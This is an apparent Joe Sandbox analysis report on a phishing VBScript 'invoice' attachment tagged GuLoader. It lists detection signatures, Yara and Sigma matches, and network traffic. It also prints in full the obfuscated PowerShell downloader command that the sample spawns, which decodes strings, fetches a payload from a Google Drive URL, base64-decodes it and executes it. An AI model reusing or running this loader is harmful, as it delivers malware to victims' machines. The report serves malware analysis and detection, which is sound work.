Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURA24021151 - BP.vbs

Overview

General Information

Sample name:FACTURA24021151 - BP.vbs
Analysis ID:1427938
MD5:c782d407c65fb588872ca0d46bf40d75
SHA1:3618270c1dadde1fd9b0b9c9a93148317f814628
SHA256:83d1ada429755f86e1468a30957b910641d112d83f44390bcfa38d5c9210d244
Tags:GuLoadervbs
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5580 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelRecipuPomacmH.tetpYvo,n.KommiHPathoe SupeaEjenddDialyeProbarAggrasCompo[Fiske$Orbi MVinteaDekorsDiktek.ommaiOrthonUnsetkPagino .ntadVarleeIngrarOversnspille B ss]Anten= Sty,$TalmuH SalseUn.ecl.ampyt RegeaBronzlPell,skofoedDerm i ProjvA.egrideflos Kreei nogtoAlpehn Perisarbe. ');$Catholicly=Fjter 'App,aoGen,nv HjoreBesoiruredtp,astrl Libeuoeve mVievapVaren.OvergDSy,enoH,lmewV,dtlnDyrehlStadso,egisasammedAriusF .ektitu erlUnr ge,poke(Solen$.olleEBoundx,ostrePrsennGrittcPreheeRottep Div,hSociaa yvel NoncuVic,is Idea,Feltt$GenspHPr vim Ratin FeweiForebn El,mgraads5 Part6Kaste) anus ';$Catholicly=$Fjerdedelsnoderne[1]+$Catholicly;$Hmning56=$Fjerdedelsnoderne[0];Jardiniere (Fjter 'Helfa$ B,skg ionol Baa,oBandobDynebaIndkolRoman:Qui zUMembrnChorad ReeteDrypsrprot k Op keUlvemnTensidUbu.deSputtlCanoes Be.keS rofsB ndb=Forto(AchloTAndedeCot esAandstEncli-ChaotPKat gaOplritMacrohS eti Pr.a$Art,yH FejlmIso.onFossiiQu.ntnT.ctog Reg 5Growt6Shirt) Stri ');while (!$Underkendelses) {Jardiniere (Fjter ' For.$ BasigAgatil .olioArchebfagotawalk,lSakes:KrimiCSkar,aVelafu Ek olidoliiLitigcNedruuBhutslBrevti skov=Relfo$Apocot,iscjr prinuProtoeAstri ') ;Jardiniere $Catholicly;Jardiniere (Fjter ' ntaiSRigsatAttriaAn.ierLoggetFiltr-Unp,lSWarkhlEftere etekeArbejp Linj Kawik4Inapp ');Jardiniere (Fjter ' ,ika$SylfigTeletlHemi o patlbKasi aCruellMestr: LeylUCholen Phl,d CinteRevaprOolitk G,ldeAkvarnN dvudP,ayeeExtenlam.trsA moceRekursFre.m=Dan.e(K imiTSun.oeColopsB andtBox u- AlloPB,odaaregult efeuhCun i aggra$ Kos,H,ynelmEmbryn ArthiMandsn BlesgLight5Indka6Sikke)Tilhr ') ;Jardiniere (Fjter 'Vurde$JernbgStrabl issoUnderb torfa BlomlU,nst:EskalTR ulerErgonidispohAffaleBrillmSpar iLoreno ZoopbDamevo,ursulSmattiS.aveoFinannTauro=Disfu$Racemg M.lilTegneoMagnebsagfraBeslulFissi: BrukR s ame,eilekBiblir and eZygo.e Stjer Asyne everdAcce.eH,rbw+Besky+Under%Lisss$TungmG,reska Ru.lnCockpgBannsrOligoe,olypl.hyto.GavstcSociaoRakkeuS ikanBil at Drak ') ;$Exencephalus=$Gangrel[$Trihemiobolion];}Jardiniere (Fjter 'Repar$DemargSunscl BideoGlycob Chuma Cl.cl Natu:.tninGAlminaSext.l Udpaa aadncStevetBanjeoMetabpAdverh Ps,cl ryggeAculebSurwaiOctaht B.azi,estrsMa.lg Afpud=Spe,i OpbygG Kirke,orspt Subh- DjrvCIntero Se,inOvergtFortjePar nnSk.altRece xtr$TumblHlibermHelafnMa olia.tranCordigInt.r5Uddat6Epita ');Jardiniere (Fjter 'Bundf$OutrogJuniolBizaroBesvrb St,ra,urfulTykta: ibizOMonilpBittedOverta VenatS.edieInforrDerobi Aftan Jul gD,stas AdvooRhi or SenddkonjanEsplaiCon.inLnintgeige.1 Ren 3 Kr,g7 Sk.a monos= Ful, Ceme[ lassSOpbl ySmartsD.osctKatj.esu scmStor,.RddikCExamioSlsetnIndbrv Dis eBook.r UdvitSent,]Repr.: Dope:PummeFSummarCarmoo ExodmFlintBAr ejaPyo.es Aeroe sang6 Over4BestrSFamilt SondrFertii PolenBypasgHala,(Ratfi$Gi miGMitisaHo,osl BalaaKontocBnkbltSkibboBostop,randhFrem.l Ca.te c,ilb NewbiEmbartEvindi,sychs Cao,)Betal ');Jardiniere (Fjter 'Lid,b$ConstgSweatlMinasoScripbHoveraU derl Ka,r:Mili.FCarlsu.efallCa,hedBushtgBadeloUre,mdLyk.seResen2 Mam 4 Ov,r4Imma H art=Phlog Mn.de[BindeSDrasty DetusSkilltHo.ogeRullemKnown.Omty Tasylre HellxSli.etHo ed.,ygniESeamsnDeserc UnreoFornidS mmeibestnnGrammg P ni]Unint:Recen:BrnevABorstSditikC Raa,IBourgI For . lfenGplanaePre.rtFore.SUndertQuodlr SulfiBesm.nVitalg Sger(Snigg$Sul.aODepilpUds,rdDidacaUler t Dapie Brsnr MaltiTr.konUndergSquansK,oldoAnticrAnteddSydafnCharsi,nplan bus,g Awa,1Kunde3 Plat7Dyref)Ouden ');Jardiniere (Fjter 'Endev$TheregskriglPinnaoEfterb Ext aFrikel Efte: SagsBEpikujInspae hy.rr Unc.gsundhe rat rGnomos,augh=Fo de$SammeFSuppeuKrantlSnobodDetong ,ervoBrochdUnreceSlaae2 Soli4 Se v4Stueg. Met sPol.tuFor ubSulphs CondtTilfarBestriUndernT aadgSpurv(Huski3Semes2haras7Frime1Ra en6Ind p4Erant, Ajou2Lath 7cring1Amora9Gluie6Koble) Muni ');Jardiniere $Bjergers;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2696 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5960INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x35f0:$b2: ::FromBase64String(
  • 0x3635:$b2: ::FromBase64String(
  • 0x367b:$b2: ::FromBase64String(
  • 0x36c2:$b2: ::FromBase64String(
  • 0x370a:$b2: ::FromBase64String(
  • 0x3753:$b2: ::FromBase64String(
  • 0x379d:$b2: ::FromBase64String(
  • 0x37e8:$b2: ::FromBase64String(
  • 0x3834:$b2: ::FromBase64String(
  • 0x3881:$b2: ::FromBase64String(
  • 0x38cf:$b2: ::FromBase64String(
  • 0x391e:$b2: ::FromBase64String(
  • 0x396e:$b2: ::FromBase64String(
  • 0x39bf:$b2: ::FromBase64String(
  • 0x3a11:$b2: ::FromBase64String(
  • 0x3a64:$b2: ::FromBase64String(
  • 0x3ab8:$b2: ::FromBase64String(
  • 0x3b0d:$b2: ::FromBase64String(
  • 0x3b63:$b2: ::FromBase64String(
  • 0x3cae:$b2: ::FromBase64String(
  • 0x687ad:$b2: ::FromBase64String(

Other

SourceRuleDescriptionAuthorStrings
amsi64_5960.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xe286:$b2: ::FromBase64String(
  • 0xd2a8:$s1: -join
  • 0x6a54:$s4: +=
  • 0x6b16:$s4: +=
  • 0xad3d:$s4: +=
  • 0xce5a:$s4: +=
  • 0xd144:$s4: +=
  • 0xd28a:$s4: +=
  • 0xf6bd:$s4: +=
  • 0xf73d:$s4: +=
  • 0xf803:$s4: +=
  • 0xf883:$s4: +=
  • 0xfa59:$s4: +=
  • 0xfadd:$s4: +=
  • 0xda87:$e4: Get-WmiObject
  • 0xdc76:$e4: Get-Process
  • 0xdcce:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", ProcessId: 5580, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", ProcessId: 5580, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelReci

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: FACTURA24021151 - BP.vbsReversingLabs: Detection: 23%
Source: FACTURA24021151 - BP.vbsVirustotal: Detection: 15%Perma Link
Source: unknownHTTPS traffic detected: 173.194.219.101:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: Binary string: ion.pdbj source: powershell.exe, 00000002.00000002.2136067379.000002B82A53B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2178700348.000002B842AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\CLR_v4.0n.pdb source: powershell.exe, 00000002.00000002.2135929745.000002B82A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 00000002.00000002.2136067379.000002B82A54E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbERSPROF] source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab=
Source: wscript.exe, 00000000.00000003.2013570328.000001B413981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013924084.000001B4139A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d6441c
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: wscript.exe, 00000000.00000003.2023391085.000001B4117C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2024986575.000001B411828000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021652412.000001B4117B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ens
Source: wscript.exe, 00000000.00000003.2013924084.000001B4139AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013570328.000001B4139AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d64
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C43D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0P
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.comP
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2136160761.000002B82B932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
